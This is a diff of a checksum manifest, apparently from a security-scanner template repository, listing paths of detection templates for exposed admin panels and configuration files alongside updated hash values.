-http/exposed-panels/ms-adcs-detect.yaml:746c22c1509d2ec5c6f8cae2f3438bae69f74b83 +http/exposed-panels/ms-adcs-detect.yaml:5e31a229adbcc47e9fee2c3dc6a2db036001aae0 http/exposed-panels/mspcontrol-login.yaml:2efa93e3937b3bbb989dfedb3068754fc7d07b14 http/exposed-panels/mybb/mybb-forum-install.yaml:1637d8ecb358325238b9bd67cf6b6246570017de http/exposed-panels/mybb-forum-detect.yaml:2e83ad6a652c58c397eb9077b669c341447cd752 http/exposed-panels/mylittleadmin-panel.yaml:54a929137a59aa12ac6a85f6bd62bf679cd6ca3b http/exposed-panels/mylittlebackup-panel.yaml:69fd6e3f2ef3ad7cf62fdef594fd9f59d3d6f3e1 -http/exposed-panels/mystrom-panel.yaml:745483f3288f6e210db78e1851a11ce3a48dc485 +http/exposed-panels/mystrom-panel.yaml:b0cf768d7324423d8aa8369f68b049af9a8a7f5a http/exposed-panels/nagios-panel.yaml:085347695497f8da0cec5548b3456ee65fd36e17 http/exposed-panels/nagios-xi-panel.yaml:25ea79e88d30d1ca8f3ef37fa994ebd98feca682 http/exposed-panels/nagvis-panel.yaml:8c31929a520b967563b2575f4c61f501acb6ac9a @@ -2835,12 +2950,12 @@ http/exposed-panels/nsq-admin-panel.yaml:e8ec4ce37326b9574b7421f368879253709065d http/exposed-panels/nutanix-web-console-login.yaml:adaf70d1776c47ffd35994c53eb7455ad335ff2c http/exposed-panels/nuxeo-platform-panel.yaml:8042b4cb6addd2b42f411b3fe0ae7c8aa3bab0b1 http/exposed-panels/nzbget-panel.yaml:d18ae8733e5ed82a0605d0d4b4a1ddab1534687d -http/exposed-panels/o2-easy-panel.yaml:8d54110b99de1127b9ac08cdddee67e5d92120d3 +http/exposed-panels/o2-easy-panel.yaml:569b78b7d0c9ef7c181c7a0d4cb9d419eabeed7e http/exposed-panels/ocomon-panel.yaml:5083088a6ed67c065a52d44f2044d2b3c0b45f26 http/exposed-panels/ocs-inventory-login.yaml:606bee9cae4261a0d32a41157ebe9260cb1490ee http/exposed-panels/octoprint-login.yaml:66fa7ce2f8f0614d3167433ff6e67f27a2b7014b -http/exposed-panels/odoo-database-manager.yaml:0551cb822fd1b10fc9b80a54710ac7ef8eb813f9 -http/exposed-panels/odoo-panel.yaml:166aa28d9d8a8fb2b32385fd48636b3db7a31b8b +http/exposed-panels/odoo-database-manager.yaml:ac1bc8b07b40a43b45cc89d5cd219c74841129d4 +http/exposed-panels/odoo-panel.yaml:9e407557c8be728d17874042c70f0f03af7c183c http/exposed-panels/officekeeper-admin-login.yaml:b49875111896a825c77a582e74f7b16a8447cbe8 http/exposed-panels/oipm-detect.yaml:e0a0251b2303ced0f0e4fcf42d9cbbcd51501685 http/exposed-panels/oki-data.yaml:4f844d629851aceaae7fb600de124174089a6643 @@ -2853,6 +2968,7 @@ http/exposed-panels/open-stack-dashboard-login.yaml:00c4c13a10b7aca2c532b3c23dd5 http/exposed-panels/open-virtualization-manager-panel.yaml:13709d02ca03b692d32e47e7240f2ada56d945cd http/exposed-panels/openam-panel.yaml:0d9eaa1730b7a71393bd46813f5dd363c6046172 http/exposed-panels/openbmcs-detect.yaml:c0dffadf1234abd53054afb87d804a4e83334aee +http/exposed-panels/openbullet2-panel.yaml:f5df6bd79e1a937a131f74dca349e98733cce0c9 http/exposed-panels/opencart-panel.yaml:e01c4be6322141368112eacd6829646aa415535d http/exposed-panels/opencast-detect.yaml:4f03eaff8e18d74ec19e91da87f5b095a3d67f5d http/exposed-panels/opencats-panel.yaml:c7228749b9250a66f82c01b1e95118986b23462b @@ -2876,7 +2992,7 @@ http/exposed-panels/oracle-business-intelligence.yaml:469a37bfb16dc8f34dcfdb206c http/exposed-panels/oracle-containers-panel.yaml:aa959d62ee67f9b4fba661a4021e722716dbee75 http/exposed-panels/oracle-enterprise-manager-login.yaml:7304a8f8f88cc93567f924cb62e568e837a34141 http/exposed-panels/oracle-integrated-manager.yaml:79eafdb64f49a416e9e9c45c9ac87a248a6a19a5 -http/exposed-panels/oracle-opera-login.yaml:823819f03d6863f069653f2bd558119e4ef23984 +http/exposed-panels/oracle-opera-login.yaml:6cfb7a895fc6f5c364539db4b799602f27afb477 http/exposed-panels/oracle-people-enterprise.yaml:5cd71d5c6f22a6a3081ea8b527be8c2c2649f63c http/exposed-panels/oracle-people-sign-in.yaml:9e10549530812a6049a16f5c09957342616d07c6 http/exposed-panels/orchid-vms-panel.yaml:67ee7ea26efe7cf5e4a65eb3f8f9c604932c5e12 @@ -2888,11 +3004,12 @@ http/exposed-panels/pacs-connexion-utilisateur.yaml:7eac9d81ada00c63ab0ca6451a4b http/exposed-panels/pagespeed-global-admin.yaml:e21098b0a8c6adc4804ab79497f69af829c5e4ba http/exposed-panels/panabit-panel.yaml:5bbcb140f26c7abfa5b30dab115b7a2db86204e8 http/exposed-panels/pandora-fms-console.yaml:32dfba09138632bcb7d984a86615216091aa8bea -http/exposed-panels/papercut-ng-panel.yaml:ddf00eadc72627f27a94b4792195edf8034375cb +http/exposed-panels/papercut-ng-panel.yaml:57081c337ca860a8a064e538df4711e1cf5d98a9 http/exposed-panels/parallels/parallels-hsphere-detect.yaml:9c647cc33b49bc5ed755d525a15d8a9a0f5b8ea4 http/exposed-panels/parallels-html-client.yaml:e4aa042070fcc50ebe395c0215678db1636af416 http/exposed-panels/parse-dashboard.yaml:9eb384fbc29bba21fd823b657596df3c821750d0 http/exposed-panels/payroll-management-system-panel.yaml:62fc62cd5f6b8328759aed653f3c97394b526d02 +http/exposed-panels/pdi-device-page.yaml:1344932df725c847d564e1cbe501be1889dd90b6 http/exposed-panels/pega-web-panel.yaml:5c2cf7ee14ef7e5f626007f807e81afc71f9ea6e http/exposed-panels/pentaho-panel.yaml:3349ae99a2ef60a21243fb95543ccae8edd1ae84 http/exposed-panels/persis-panel.yaml:a7431b703bd9eb1c632e59f32a2ff5de09973309 @@ -2924,7 +3041,7 @@ http/exposed-panels/project-insight-login.yaml:31b350d211dcd1ba5b9efa7690984fea2 http/exposed-panels/projectsend-login.yaml:86b753f5e66bae059ecc809035f308e164cc1852 http/exposed-panels/prometheus-exposed-panel.yaml:efc1453ba08aebefa9bd42cf76002ffab3fe1500 http/exposed-panels/prometheus-pushgateway-exposed-panel.yaml:1ccdb1bd78e0513a9e8ae7d1363f076f529664d7 -http/exposed-panels/proxmox-panel.yaml:86536223f7780e8df9817de5ccfa02da34e7c8bf +http/exposed-panels/proxmox-panel.yaml:8f131b021c8d64e3a2ed0c865c306e60cfeb9b51 http/exposed-panels/pulsar-admin-console.yaml:a09657de381c143ef15246feff5381e17a9ee23e http/exposed-panels/pulsar-adminui-panel.yaml:231f2e02600d1679fa324839adc669e105f44f40 http/exposed-panels/pulsar360-admin-panel.yaml:26a7c693e6a0dd3d45bfe5928943755cd8b80820 @@ -2944,17 +3061,18 @@ http/exposed-panels/r-webserver-login.yaml:98ca70ad575015679c468b4206aca282e9592 http/exposed-panels/rabbitmq-dashboard.yaml:e80a0d1b9b871528962812315f71c8b6c00f9773 http/exposed-panels/racksnet-login.yaml:658fe39df6cc514ae1cf980024cd206af4374ce7 http/exposed-panels/radius-manager.yaml:7870f2ef34dd0e0e5f4b307019e2d7d334193221 -http/exposed-panels/rancher-panel.yaml:086ea3443182f00650917df0b108e830b4c31902 +http/exposed-panels/rancher-dashboard.yaml:5bd544b300e426c36795ca802bf65fbb5dacec8b +http/exposed-panels/rancher-panel.yaml:1b09e8c501b2208cbf820e9eeff9ba3699db9d96 http/exposed-panels/raspberrymatic-panel.yaml:f770f1717ac426b4164e30d1983ad939ae63b26a -http/exposed-panels/red-lion-panel.yaml:8bf799f917691b0ee3d90a234844d23bf098cbdd +http/exposed-panels/red-lion-panel.yaml:f36d2b2fe7cfdab8e00ed58e338381ea6d035ab3 http/exposed-panels/redash-panel.yaml:88d7bc4fa440268086159431055fd8cc75e93830 http/exposed-panels/redhat/redhat-satellite-panel.yaml:80bad891a060a6c4912fc8d2a8af5364207c6f9c http/exposed-panels/redis-commander-exposure.yaml:1d7dc556a0245ebc59c5b22583cbc637ed9b3e24 -http/exposed-panels/redis-enterprise-panel.yaml:4250c1ee775d6d9bb580923b6a50fb8cab8444a6 +http/exposed-panels/redis-enterprise-panel.yaml:5a81b19aa75fc56982a11a98287f304a4251dcfd http/exposed-panels/remedy-axis-login.yaml:f6205ed2281bba81d118e31807059062c6d64750 http/exposed-panels/remkon-manager-panel.yaml:1d61296c7549a66c6bbf8f45fb2216728dc83a5c http/exposed-panels/remote-ui-login.yaml:b474a89578a96cc613ffa3532b1308ce14fdb332 -http/exposed-panels/repetier-server-panel.yaml:3866fd0b08558b2111209496ea2693eb1f5117be +http/exposed-panels/repetier-server-panel.yaml:5b0e69799dedd3a2f9973532f159155e1e42fda0 http/exposed-panels/residential-gateway-login.yaml:240a2d45985cff8a35d5ff8a1c40d26507e7dbda http/exposed-panels/retool-login.yaml:3927f2181acae2036ddda8b3c3c9677a85bad02c http/exposed-panels/riseup-panel.yaml:ec1b4f8a97935e9f07573ae2afedc5f42dab2e4f @@ -2975,19 +3093,19 @@ http/exposed-panels/saltgui-panel.yaml:b3f6cae4c5928d5ede4b70c39eb2307a2e46a634 http/exposed-panels/saltstack-config-panel.yaml:db020b26e0bae954938b41f9b7e0c5b1e57d9fae http/exposed-panels/samba-swat-panel.yaml:74f8a22d17390877c7d7a636e19bdd2398e5cec8 http/exposed-panels/samsung-printer-detect.yaml:3c1023766d2bb65bae078182e4f1e5c663273614 -http/exposed-panels/sap-cloud-analytics.yaml:18b88e880b0b47e640cef8c8794f3b24f6d76dda +http/exposed-panels/sap-cloud-analytics.yaml:280efb2f054b5ecf033ffec064c3fee8f814c388 http/exposed-panels/sap-hana-xsengine-panel.yaml:8d3119b3a5eb0d500b91f85f1446310a989a0f86 http/exposed-panels/sap-netweaver-portal.yaml:6ab4fdc76e9d6f8ebd1803ce124019cd3b005361 -http/exposed-panels/sap-successfactors-detect.yaml:6584b38c208afafbfa221c5dddee9af58a2b72ba +http/exposed-panels/sap-successfactors-detect.yaml:17477e87b01bcbbb92e3a1d5e9880cc2bc8a95b8 http/exposed-panels/sapfiori-panel.yaml:1f3454f11cea03cd6fdf4dea45dce1a1be0f7537 http/exposed-panels/sas-login-panel.yaml:500c6b6935cd0b16fc5f78276dd6f3c97c10e449 http/exposed-panels/sauter-login.yaml:1923c11b2ba3765b8baed1fc16aba45633a830a4 -http/exposed-panels/sauter-moduwebvision-panel.yaml:c1d8373a231b90dc560a1c7eaf1b8bcaa331d0a8 +http/exposed-panels/sauter-moduwebvision-panel.yaml:b83910490f24a5c81ba7058dc742e7fbe8b38ada http/exposed-panels/scriptcase/scriptcase-panel.yaml:9479327ed20d4d3d49a22a89830db9da1246d3e3 http/exposed-panels/scriptcase/scriptcase-prod-login.yaml:c7f1b57597ebd9e1d165aa3879917f548ec21228 http/exposed-panels/scs-landfill-control.yaml:15bb5b59e0615baa29a42e2ccf1b248964d6dfa8 http/exposed-panels/seafile-panel.yaml:7c9640c6c9842aa4296777ed123079a6c132f4d5 -http/exposed-panels/seagate-nas-login.yaml:759e39064dac7eafdc2403cc6e59c774400b422d +http/exposed-panels/seagate-nas-login.yaml:f7969f37199508a8d17312e54b75f611fde5dae3 http/exposed-panels/seats-login.yaml:e5ae30942747ada57ed6b75819b61132e0cf243b http/exposed-panels/secmail-detect.yaml:a68177b76ccdeaa1aef9a9000e64e17b7757247b http/exposed-panels/secnet-ac-panel.yaml:26439c0736e201ad9b70569ce1f58922aa984e5f @@ -2998,15 +3116,16 @@ http/exposed-panels/securityspy-detect.yaml:759dba679c92d51c2db1822e5d338d2165b1 http/exposed-panels/seeddms-panel.yaml:11ad4293e38da75fafb34cdd46114b6adacf1cd0 http/exposed-panels/selenium-grid.yaml:d93ed98ae17e218243fc856bce8a3cfe4a18b582 http/exposed-panels/selenoid-ui-exposure.yaml:9f0b3e39295ef7143574d666cf65118c28b920cc -http/exposed-panels/sensu-panel.yaml:03159c73ca061df9c9b67137730e4fc741878399 +http/exposed-panels/selfcheck-panel.yaml:f4f9de41063bb58973e3d08501ab842a5d43ab60 +http/exposed-panels/sensu-panel.yaml:d19e65335de79077178b7db32e1297cf938488cf http/exposed-panels/sentinelone-console.yaml:c6042ed3993f20f21bf94a7e2072e83e45d9f715 http/exposed-panels/sequoiadb-login.yaml:c480475df891191f3cfc42e03a91b8a699ec0b9e http/exposed-panels/server-backup-login.yaml:2ceb76dc2dbdde827a5aaa1b1600bd8e9d5ff5b6 http/exposed-panels/server-backup-manager-se.yaml:50c0f1b778bc723ba1d29d2a6819597e6612cd20 http/exposed-panels/servicedesk-login-panel.yaml:09aac2df9749536ad35c0e8e08b6ce282366374b -http/exposed-panels/sevone-nms-network-manager.yaml:fe103c88ad39260743abc94906bdc4d27b167821 +http/exposed-panels/sevone-nms-network-manager.yaml:4ac455292f369d1f2b177de0a54462271972584f http/exposed-panels/sgp-login-panel.yaml:8280ea2a79b7987c7a2b25dbeb1526637594af3d -http/exposed-panels/shardingsphere-panel.yaml:7870aa196cabcbe58a34e46a82315e22a906065f +http/exposed-panels/shardingsphere-panel.yaml:74c74af297b5f4ec3712f8a47714a83e94256477 http/exposed-panels/sharecenter-login.yaml:b6098f3ea9d1d1ff3ef4f46e4ab5350fc731fc27 http/exposed-panels/shoutcast-server.yaml:51bd58a83ff87cc4f39123cde0556b2dc35235c0 http/exposed-panels/sicom-panel.yaml:e8f4355647b5cc6f7e052a5cf3f42a72b2f1e31c @@ -3027,24 +3146,25 @@ http/exposed-panels/somansa-dlp-detect.yaml:06de620a76f92e453c050f06aeb66de91887 http/exposed-panels/somfy-login.yaml:34a05a708ef3da96d2e31b943cb11920470d35f5 http/exposed-panels/sonarqube-login.yaml:232f9d2f13dcfe388aa122b7657c62290cec5e73 http/exposed-panels/sonic-wall-application.yaml:a7ab9efb580fe5b12bb5d1cabc2775e2248c45c7 -http/exposed-panels/sonic-wall-login.yaml:1db828d57e9189eab85229b5917e5065bcf64a64 +http/exposed-panels/sonic-wall-login.yaml:23fd03e3f7268b3302e62a3df9687b89bad684e5 http/exposed-panels/sonicwall-analyzer-login.yaml:651f8610f7d61f3afc44566609113043bbbc0910 http/exposed-panels/sonicwall-management-panel.yaml:7177a546aaef4aa44a3ed974fce464cb32df3ea3 http/exposed-panels/sonicwall-sslvpn-panel.yaml:10768fac7db18c63bb28a9ea934d9d88161946b9 http/exposed-panels/sophos-fw-version-detect.yaml:cc481ce4ba9bb2b263a9010ce359b28c274d17ba http/exposed-panels/sophos-mobile-panel.yaml:81d05d99308c69f1898085eae5d867d9b6bfe94b -http/exposed-panels/sophos-web-appliance.yaml:ee00289a37d56f096362a000dbb53a95e866638d +http/exposed-panels/sophos-web-appliance.yaml:3d79213a014484cf9adfe377e5d58afb6feaf3f8 http/exposed-panels/spacelogic-cbus-panel.yaml:3ace23d1ced8be98108bdf7339f970c2dfc51a25 http/exposed-panels/spark-panel.yaml:ac6d9ff50a9e9947c60e871510bfee113509d35b http/exposed-panels/sphider-login.yaml:cccdb6cccd24358cffb74907a32a865257d2d9fe http/exposed-panels/spiderfoot.yaml:92992a318d21b359aa011d8acadfd1b1f13663c8 http/exposed-panels/splunk-enterprise-panel.yaml:259a9f826a6ea5aa45cd9c8f945c23a66084be4f http/exposed-panels/splunk-login.yaml:49031cada9f04daed7b4711c987c80aaa47dc7fd +http/exposed-panels/spotweb-login-panel.yaml:93b91f4dbd82c66b8318dabb2ad938132322fa12 http/exposed-panels/sql-monitor.yaml:c1c2959922421cce25f3f011e31625007be9e759 http/exposed-panels/sqlbuddy-panel.yaml:3f3296380d18330a779f066d4f134eb48252a726 http/exposed-panels/squirrelmail-login.yaml:bfded236cb2f6d5efa18b4de31115de36dfbe6fb http/exposed-panels/sqwebmail-login-panel.yaml:4d472f9a3e5912129b037b686c283b70b2760c0c -http/exposed-panels/star-network-utility.yaml:3adcc85e41a2eabe4c31a3f05769fbfd6e4df473 +http/exposed-panels/star-network-utility.yaml:951ca634ba378e49a9672b6f88e5e72c648667a9 http/exposed-panels/start-element-manager-panel.yaml:a1cf7a259067b4ad659a7524b9d0edbe0d6519f4 http/exposed-panels/steve-login-panel.yaml:de7ab027d568614895d9c316dfbb57e285771252 http/exposed-panels/storybook-panel.yaml:0ee2dc25737edae1c8e80745b3c0b9f0524499fc @@ -3065,6 +3185,7 @@ http/exposed-panels/symantec/symantec-ewep-login.yaml:c12467cdedce8210a2cb11d989 http/exposed-panels/symantec/symantec-iam-console.yaml:6b5f51ea0dffbcb834e8a4e5861c50e643c6bfc8 http/exposed-panels/symantec/symantec-pgp-global-directory.yaml:3d4f1437e6b3c8dcb1b379c08e26ab11bf45f2b5 http/exposed-panels/synapse-mobility-panel.yaml:f41ec14f15af49fe67218ecda8ec11a4d1acbacb +http/exposed-panels/syncserver-panel.yaml:1b8457c7d6b0c683683afa3757c8d0df244d1963 http/exposed-panels/syncthru-web-service.yaml:02bb50ccaf5240c2b82962554d8f608b9bd5e0bd http/exposed-panels/synnefo-admin-panel.yaml:f74be29a50a186f60c3cb8ba3957ba38f6356865 http/exposed-panels/synology-rackstation-login.yaml:04f9bfcd16e0d8a943afc51fef7e77c703b25864 @@ -3083,12 +3204,14 @@ http/exposed-panels/tembosocial-panel.yaml:c925f1004ae9a3a61a6422c9202b485679cee http/exposed-panels/temenos-t24-login.yaml:cda4fc3603203331b49748810bb5a1a1325d910d http/exposed-panels/tenda-11n-wireless-router-login.yaml:f00e9d9b61c6bfaadf0221a7f659b40a09573b04 http/exposed-panels/tenda-web-master.yaml:ad50ba6d3dff1e561384ea7efdb7098ef7be63b4 +http/exposed-panels/teradek-panel.yaml:0989cfd13fb91e4d130d40a5c4e5bf29caffa8a1 http/exposed-panels/teradici-pcoip-panel.yaml:23485d5b8080a06bffcede4857f610263fc86ac1 http/exposed-panels/terraform-enterprise-panel.yaml:98b6a43cb41c9b78ea20811940921a46398794fd http/exposed-panels/terramaster-login.yaml:a7ae270ceb22a54a01f672680700ca2f7ff45460 http/exposed-panels/thinfinity-virtualui-panel.yaml:8913e9c26ab24b84d65440ed8a4a84280b53ed01 http/exposed-panels/threatq-login.yaml:d0e4b791fa342bdfbaa64d59e0ef3e78bd6f6d60 http/exposed-panels/thruk-login.yaml:b1229321f3aebb8e1e5b8bc9b8f52d725b7decf8 +http/exposed-panels/tigase-xmpp-server.yaml:e4c6b531888b16163c4ae94a75e1e7707b01def3 http/exposed-panels/tikiwiki-cms.yaml:4ac7291f0fff08fe63b022728630d255357a4b44 http/exposed-panels/tiny-file-manager.yaml:e9a738a44602a4ffaf3c0085184365711870d400 http/exposed-panels/tomcat/tomcat-exposed-docs.yaml:4fd8a7b1a7c79d104d7f8ff976115c7d38bb1016 @@ -3099,6 +3222,7 @@ http/exposed-panels/tracer-sc-login.yaml:f2488682bd1645443b5c815d1cdbed4d5bc16a5 http/exposed-panels/traefik-dashboard.yaml:b185cd338488c0024b5db23bc3afe3ace7af4176 http/exposed-panels/trendnet/trendnet-tew827dru-login.yaml:3e401f83250d3461e5bf1c1142afdd1468d5d219 http/exposed-panels/tufin-securetrack-login.yaml:cdb189908931aded54acb7db492bfbe5215fecc5 +http/exposed-panels/tup-openframe.yaml:d42bcab5f6c73f7ad2465d8e3143ed982bdcfa54 http/exposed-panels/turnkey-openvpn.yaml:0396472972fce09f9cbdf2ea3ad1168c686898cb http/exposed-panels/tuxedo-connected-controller.yaml:9d7aa611b6051c2aabfcdd0d5ef9edafc2cb056c http/exposed-panels/typo3-login.yaml:0cda49b46ede824921c64adb6f9a1720e2480d5f @@ -3112,7 +3236,7 @@ http/exposed-panels/vault-panel.yaml:03707a6899d5697afa8a742aded5e86fe852d057 http/exposed-panels/veeam-backup-azure-panel.yaml:1d8eed0e466fa8b83f9304b5993212457bb7758e http/exposed-panels/veeam-backup-gcp.yaml:a67c427e40a2762ad944b229c59a5b54373358b2 http/exposed-panels/veeam-panel.yaml:a3b644bb867a9b3ed60279454b7b0e1e9d7ed4d1 -http/exposed-panels/veriz0wn-osint.yaml:7e96161f675f5a4a968d494971bc4eff62d4d951 +http/exposed-panels/veriz0wn-osint.yaml:485c50da6c7eb638518a84bcdfef95aaa52b0fc0 http/exposed-panels/verizon-router-panel.yaml:9ecaf7ee4043d6a15a850377fcffae6984e97cea http/exposed-panels/versa/versa-director-login.yaml:b4f52b024cbc5be28feb9c27f73ad991dcfb12d9 http/exposed-panels/versa/versa-flexvnf-panel.yaml:c9cc16a182684a75874d7ca92e749955afbb16c1 @@ -3139,16 +3263,18 @@ http/exposed-panels/wago-plc-panel.yaml:9c53ea7ed93d0c709afd20768868418ef71bdcf1 http/exposed-panels/wagtail-cms-detect.yaml:71a335e93176371f47f3c603623a2298b8428406 http/exposed-panels/wallix-accessmanager-panel.yaml:3325064abe01a317b3de5c23ae6bb9e1cbe7c1a6 http/exposed-panels/wampserver-homepage.yaml:d850b886f9e2771451167c17cfa24b8ebe11a626 -http/exposed-panels/watcher-panel.yaml:ad578f1b3759ea3f844aed6dd6f362be9e6804bf +http/exposed-panels/watcher-panel.yaml:440ca716ee7ebb1e6807b4850f6b7bf060949272 http/exposed-panels/watchguard-panel.yaml:f0a3a148897cdcbfc4e7ad04e5888a0e93a58c3f -http/exposed-panels/watershed-panel.yaml:3d6997c64db42f8c6c7ffa43fce4a4cf2412760c +http/exposed-panels/watershed-panel.yaml:7918e42652637d06a0ee666d409a31adb4132f9d http/exposed-panels/wazuh-panel.yaml:b660ca00553185f41aed053ed941e24117c96c86 +http/exposed-panels/wd-mycloud-panel.yaml:10ea03ac14ca740699c20005828b57b93fef5c14 http/exposed-panels/weatherlink.yaml:71ed7232c8f220897cd120533b5df70f7a13ed24 http/exposed-panels/weave-scope-dashboard.yaml:4d95c87da158f5b20ca175e516814d8356ca6ad6 http/exposed-panels/web-file-manager.yaml:4b642b153e44abe1ef355988c92f2f652bf73d86 http/exposed-panels/web-local-craft.yaml:4fe1d6955b7486867cc9ab8fc3673c0a1057ef84 http/exposed-panels/web-service-panel.yaml:79c86e04b98ab8218b3d39cd1d74e9e241e3e59d -http/exposed-panels/web-viewer-panel.yaml:e9675388b23a666ffee67978e8f9a38cfea543f9 +http/exposed-panels/web-viewer-panel.yaml:a2fff892d6eab8c672cfddffddfc9384ed44e4bb +http/exposed-panels/webcomco-panel.yaml:e850b58a121aed2f4014d386b41ac383e65e80dd http/exposed-panels/webeditors-check-detect.yaml:c7c08a960d02f30292e44c6ddfd85b12af5d0a1c http/exposed-panels/weblogic-login.yaml:7397cce2ecbe2a216a9d6fb0c6d1117c1aed43ab http/exposed-panels/weblogic-uddiexplorer.yaml:1199284245ff3a16e7833a0ac276933ef080af3e @@ -3179,7 +3305,7 @@ http/exposed-panels/xvr-login.yaml:0617c6854f707a8229705ee7757f3b8b549128e3 http/exposed-panels/xweb500-panel.yaml:90cb373d99faddbd8e6a7ac661614df3d999b644 http/exposed-panels/xxljob-panel.yaml:810b3d0f8ebbb9784d1d9d79a9bff4989d574bc0 http/exposed-panels/yarn-manager-exposure.yaml:6741df835f9e9aa726055f681793212f8400e780 -http/exposed-panels/yellowfin-panel.yaml:b11558debf2025f3b42123caed288f6f88be7223 +http/exposed-panels/yellowfin-panel.yaml:d28a93efdca5c4cbcb0da2dcb1bc3b4501b65cd6 http/exposed-panels/yopass-panel.yaml:2f179978978252aed9cdb0ae0314fe5071bb97ae http/exposed-panels/yzmcms-panel.yaml:4d5fdf75eb425b05da04623dd8541039c50515f3 http/exposed-panels/zabbix-server-login.yaml:fb17d4aac628aeda5bbda99163f5ee898fabeeb3 @@ -3200,7 +3326,7 @@ http/exposed-panels/zoho/manageengine-applications-manager.yaml:6c676367b103aaf1 http/exposed-panels/zoho/manageengine-assetexplorer.yaml:d0a6408160e345d5fcdb207750dcc465214fa6d4 http/exposed-panels/zoho/manageengine-desktop.yaml:8e6036a4c91599eba2f1d85dc2a4aa9db6f783ba http/exposed-panels/zoho/manageengine-keymanagerplus.yaml:512b12f0bfec0a386d73897a81b19906d9a467f9 -http/exposed-panels/zoho/manageengine-network-config.yaml:a4a8ad2116d6c5f0f05b1afb667ae1212744c486 +http/exposed-panels/zoho/manageengine-network-config.yaml:73fa8b6eafa8ed6c4b7a1ed534beafb0a0519e0f http/exposed-panels/zoho/manageengine-opmanager.yaml:e9d212961eb84d2c6fb36bbf2091830c9d670b76 http/exposed-panels/zoho/manageengine-servicedesk.yaml:ec9302366bdc122878747a4053f75ce8a537a374 http/exposed-panels/zoho/manageengine-supportcenter.yaml:b93fc61a9a76294f2e92bef5997481471a0d2415 @@ -3213,7 +3339,7 @@ http/exposed-panels/zyxel/zyxel-vsg1432b101-login.yaml:35fb29e042415a8f08217ff2d http/exposed-panels/zyxel-router-panel.yaml:ae6e8ef2361d2976ab338b156e857fa944dba4a0 http/exposures/apis/couchbase-buckets-api.yaml:cbb41a24a81bcec180a69d2c30ebdb9de97513b9 http/exposures/apis/drupal-jsonapi-user-listing.yaml:977e6f5d4ef9528b3ecaf7ec7bc18b62e631c581 -http/exposures/apis/jeecg-boot-swagger.yaml:3b406bd2ba636e4d20d2156ec0aacfc1530078de +http/exposures/apis/jeecg-boot-swagger.yaml:dc3fcfe73d3514b2d0a164fdf65ac60d72b35929 http/exposures/apis/openapi.yaml:411d1b7c30b8150edeb47b6e68b99ee97f211ca1 http/exposures/apis/strapi-page.yaml:9e3c0643b12a045247a1535e141fa4218ed54165 http/exposures/apis/swagger-api.yaml:032bb08dbd5e4d6f303e861e960ba0714b0e261e @@ -3233,12 +3359,14 @@ http/exposures/configs/ansible-config-disclosure.yaml:2aa264bdb32676f39bdaeed3c9 http/exposures/configs/apache-config.yaml:dd5b6071f91df0b62f5eabb94d08cbbb7ed2561d http/exposures/configs/appspec-yml-disclosure.yaml:e75071a217c8c8e12032ff2d6cf0c6d1eb9a0af5 http/exposures/configs/appveyor-configuration-file.yaml:a7f8cbaf1f38bd4a7cbd8473811339b915eaec57 +http/exposures/configs/aws-config.yaml:70efea99a4687b9ad02505f5c4504b39c8bc4fa4 +http/exposures/configs/aws-credentials.yaml:508b331520250241fc2f11838af6959d93090215 http/exposures/configs/awstats-config.yaml:5a4480c1065caa06ae267b4f43a1d99b7281faa1 http/exposures/configs/awstats-script.yaml:417e4118f9cff4be479a1d72a8c1b843b177116c http/exposures/configs/azure-domain-tenant.yaml:4221ba578d2d90e3043b954efed08f2a862851d6 http/exposures/configs/babel-config-exposure.yaml:2b8bfc15b4c07394b9db8e5816e95dd5cb0150cb http/exposures/configs/behat-config.yaml:83ee299a64604a8adfc5ef857b49236a0dfd0686 -http/exposures/configs/blazor-boot.yaml:40f2e9fedcb2f69e6cad309cb5c1642255b940fd +http/exposures/configs/blazor-boot.yaml:a93185295bf759ac9503e84915277ae1bf0f02cc http/exposures/configs/cakephp-config.yaml:9ba24768d4928acbc72397e9467a93f488d4a9d4 http/exposures/configs/cgi-printenv.yaml:785db449c380cb88b08e9886a92e49fd78ce9afb http/exposures/configs/circleci-config.yaml:e42e898581b35974ca4333d3b14f158d620f8867 @@ -3246,9 +3374,9 @@ http/exposures/configs/circleci-ssh-config.yaml:18d32e88826710a1b8c9ec73576f6aae http/exposures/configs/cisco-network-config.yaml:f159889b638528c4acdadff6e18f3d2a70ec586e http/exposures/configs/codeception-config.yaml:e8c89a76b7831aa1656674732f61bcf243d4a084 http/exposures/configs/codeigniter-env.yaml:c05bb8e3c81ffa2400f9a05f5c74c5be2148bdfc -http/exposures/configs/composer-config.yaml:c093a1976a1de341d31c9724de8eb4c756ba9910 +http/exposures/configs/composer-config.yaml:3f01cc8777b325a3a165c4336f1fbd68b6bfa989 http/exposures/configs/config-json.yaml:12b570a3b9a3dc713b0ec4d73b1f68ff9dba9123 -http/exposures/configs/config-properties.yaml:ada256740a3545e915ed28e3de6e661ce67c5293 +http/exposures/configs/config-properties.yaml:15f9e7ca135d3ccf0ceea4feb93857b78fab76ea http/exposures/configs/config-rb.yaml:c2ef1877923082bc0437e880b51feb286ec1c8ab http/exposures/configs/configuration-listing.yaml:1eeb6ee5fb0d0c33e277fc91d7f5a6768ec4eefc http/exposures/configs/coremail-config-disclosure.yaml:941c31b26122b9ba9686bb5b360f72d7d6b92d04 @@ -3271,7 +3399,7 @@ http/exposures/configs/exposed-sharepoint-list.yaml:1017bd36155fbf033b6dfbbc1ced http/exposures/configs/exposed-svn.yaml:1c9abd7c925ebc7896edd0b6b03524a1257c2eb5 http/exposures/configs/exposed-vscode.yaml:4aa97e61379cb6f05e0f6adc5c7da2060b2f70cb http/exposures/configs/firebase-config-exposure.yaml:89adc00b74e456ad16d6c560d0048158a69941df -http/exposures/configs/ftp-credentials-exposure.yaml:8249213ad5daf203f0661122331427cb15ddca06 +http/exposures/configs/ftp-credentials-exposure.yaml:22b616390b30a091a491ef3c0a8434585ee78d78 http/exposures/configs/gcloud-config-default.yaml:c81ae52f143145e13fb5d5103774328dfc97d7ec http/exposures/configs/git-config-nginxoffbyslash.yaml:c5799733f724f93e9b4e45290e252b27313b9f7c http/exposures/configs/git-config.yaml:6ae6b75098afd891bdec69a5463f048f07be4f97 @@ -3286,14 +3414,14 @@ http/exposures/configs/honeywell-scada-config.yaml:340879ed0d0ac273a971720469a64 http/exposures/configs/hp-ilo-serial-key-disclosure.yaml:e0cbe807a7185bdfac0f21c16c37dab2fc6a2b93 http/exposures/configs/htpasswd-detection.yaml:b677719d94454897acc1453c0a63b9f830c80147 http/exposures/configs/httpd-config.yaml:338924fba6e1e94d1489e7c59e76ef36d121c139 -http/exposures/configs/javascript-env.yaml:67344bf4649bbdb839fb5373d0f5d6103902ace8 